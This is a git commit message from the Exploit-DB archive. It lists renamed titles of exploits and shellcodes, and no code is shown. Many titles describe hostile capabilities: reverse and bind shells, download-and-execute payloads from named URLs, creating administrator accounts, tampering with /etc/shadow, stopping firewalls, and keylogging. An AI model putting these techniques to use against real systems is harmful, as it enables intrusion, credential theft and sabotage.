From 8a2e4ff27a64a0cf0998135359beceb2569775f2 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 19 Jan 2018 05:01:43 +0000
Subject: [PATCH] DB: 2018-01-19

58 changes to exploits/shellcodes

Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (1)

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)

Rosoft Media Player 4.2.1 - Local Buffer Overflow
Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow

GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)

glibc - 'getcwd()' Local Privilege Escalation

JAD java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow

JAD Java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)

Ability Server 2.34 - Remote APPE Buffer Overflow
Ability Server 2.34 - 'APPE' Remote Buffer Overflow

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)

Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)

Primefaces 5.x - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection

BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)

Linux/x86 - execve() Null-Free Shellcode (Generator)
Linux/x86 - execve() + Null-Free Shellcode (Generator)

Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Generator Null-Free Shellcode (Generator)
Linux/x86 - Command Generator + Null-Free Shellcode (Generator)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)
Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - reboot() + PUSH Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)
Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)

Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - execve() + Read Shellcode (92 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)

Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)

Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)

Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)
Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)

Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)

OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - Reboot() Shellcode (28 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)
Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)

Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)

Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)
Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)
Windows/x86 - Egg Omelet SEH Shellcode
Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows/x86 - Download File + Execute Shellcode (192 bytes)
Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)
Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)
Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)
Windows/x86 - Command WinExec() Shellcode (104+ bytes)
Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode
Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)

Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode

Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)

Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)
Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)
Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)

Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter JITed Stage-0 Shellcode
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - JITed Stage-0 Shellcode
Windows/x86 - JITed exec notepad Shellcode
Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)
Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode
Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)

Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)

Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)

Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode

Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)
Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode

Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)
Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode
Windows Mobile 6.5 TR - Phone Call Shellcode
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode

Windows x86 - Eggsearch Shellcode (33 bytes)
Windows/x86 - Eggsearch Shellcode (33 bytes)

Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)
Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter Shellcode (31 bytes)
Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox Null-Free Shellcode (113 bytes)
Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox + Null-Free Shellcode (113 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)

Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)

Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)
Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)

Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)

Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)

Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)

Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)

Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
